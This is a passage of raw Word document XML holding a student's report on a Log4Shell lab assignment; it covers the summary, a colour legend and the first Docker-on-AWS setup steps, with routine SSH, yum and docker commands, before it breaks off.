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F0F09" w14:textId="6BEDB5D4" w:rsidR="00B11385" w:rsidRPr="009F01AC" w:rsidRDefault="00B11385">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Zehra Syeda Sarwat </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Cybersecurity Architecture - Assignment 9 </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>May 25, 2027</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914E76A" w14:textId="71A00AF5" w:rsidR="00DB2051" w:rsidRDefault="00DB2051">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2051">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Securing Systems Against Log4Shell Exploits Using Docker and MITRE Frameworks </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63880A5E" w14:textId="3476B545" w:rsidR="00B11385" w:rsidRPr="009F01AC" w:rsidRDefault="002977F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B11385" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In this report I will cover step by step experience as I complete assignment 9. </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This was an incredibly invigorating exercise as I simulated the attack, and then worked on how to prevent it. Key learnings are highlighted in blue throughout the doc. From small learnings to being more careful on file names (caps versus lower) to learnings on what log4j vulnerability actually is and how to prevent it – I thoroughly enjoyed this assignment – even though there moments of ‘despair’. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F438F53" w14:textId="7856C955" w:rsidR="002977F0" w:rsidRPr="009F01AC" w:rsidRDefault="002977F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I have a video</w:t>
      </w:r>
      <w:r w:rsidR="00DB2051">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, but it is towards the end</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as it took me days to do this and as you will see below, I had no way of knowing if things would work (if I should record), or they wont, until they worked! So I tried to screen shot everything so you have a record as I completed this over a number of days – breaking throughout the day for work and coming back to this. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B30137" w14:textId="77777777" w:rsidR="002977F0" w:rsidRPr="009F01AC" w:rsidRDefault="002977F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Legend: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01869750" w14:textId="7DE37035" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="002977F0" w:rsidP="009E0422">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Errors and how I fixed them</w:t>
      </w:r>
      <w:r w:rsidR="009E0422" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps I took outside of errors </w:t>
      </w:r>
      <w:r w:rsidR="009E0422" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Top Learnings </w:t>
      </w:r>
      <w:r w:rsidR="009E0422" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Code I used </w:t>
      </w:r>
      <w:r w:rsidR="009E0422" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="009E0422" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Instructions from assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F431CE8" w14:textId="56526D43" w:rsidR="00B11385" w:rsidRPr="009F01AC" w:rsidRDefault="00B11385" w:rsidP="00B11385">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 1: Environment Setup and Exploitation (MITRE ATT&amp;CK) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D64CF4A" w14:textId="49425655" w:rsidR="002977F0" w:rsidRPr="009F01AC" w:rsidRDefault="002977F0" w:rsidP="002977F0">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Set Up: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC191B" w14:textId="0C225776" w:rsidR="00B11385" w:rsidRPr="009F01AC" w:rsidRDefault="00B11385" w:rsidP="002977F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">First I needed to set up my Docker instance on AWS. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F676F4F" w14:textId="1CD6B8D0" w:rsidR="001012E6" w:rsidRPr="009F01AC" w:rsidRDefault="00F111A8" w:rsidP="001012E6">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Created AWS instance </w:t>
      </w:r>
      <w:r w:rsidR="002977F0" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Connected via SSH: </w:t>
      </w:r>
      <w:r w:rsidR="001012E6" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ssh -i "C:\Users\zehra\Desktop\HW9\mykeyass9.pem" ec2-user@18.117.114.253</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4E74EE" w14:textId="6FDC04EC" w:rsidR="001012E6" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="001012E6">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Installed Docker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAEE13A" w14:textId="77777777" w:rsidR="001012E6" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="001012E6">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo yum update -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AAF324" w14:textId="77777777" w:rsidR="001012E6" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="001012E6">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo yum install docker -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273E8EC3" w14:textId="77777777" w:rsidR="001012E6" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="001012E6">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo service docker start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722FB04F" w14:textId="25F78AC9" w:rsidR="001012E6" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="001012E6">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo usermod -aG docker ec2-user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE3691D" w14:textId="70E22878" w:rsidR="001012E6" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="002977F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Now applying group permission change </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A625E3" w14:textId="1CB0AE86" w:rsidR="001012E6" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="001012E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475F86E9" w14:textId="27267336" w:rsidR="001012E6" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="001012E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ssh -i "C:\Users\zehra\Desktop\HW9\mykeyass9.pem" ec2-user@18.117.114.253</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6601F000" w14:textId="1877A060" w:rsidR="001012E6" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="002977F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Running Docker container with shared folder </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD29015" w14:textId="45E0FECB" w:rsidR="001012E6" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="00B11385">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mkdir ~/shared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6238404D" w14:textId="06604B17" w:rsidR="001012E6" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="00B11385">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>docker run -dit --name mycontainer -v ~/shared:/data ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0C26E6" w14:textId="77777777" w:rsidR="002977F0" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="00B11385">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">setting up WinSCP because I find it easier to use when modifying and moving files around. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B2DE6" w14:textId="77777777" w:rsidR="002977F0" w:rsidRPr="009F01AC" w:rsidRDefault="001012E6" w:rsidP="002977F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Converting .pem to .ppk</w:t>
      </w:r>
      <w:r w:rsidR="00544288" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – went to this site </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00544288" w:rsidRPr="009F01AC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Download PuTTY: latest release (0.83)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00544288" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, used puttygen.exe. Loaded the key and converted to ppk. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE9CEB2" w14:textId="77777777" w:rsidR="002977F0" w:rsidRPr="009F01AC" w:rsidRDefault="00544288" w:rsidP="002977F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Now need to set up connection in WinSCP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394FC001" w14:textId="44578082" w:rsidR="004A708D" w:rsidRPr="009F01AC" w:rsidRDefault="004A708D" w:rsidP="002977F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
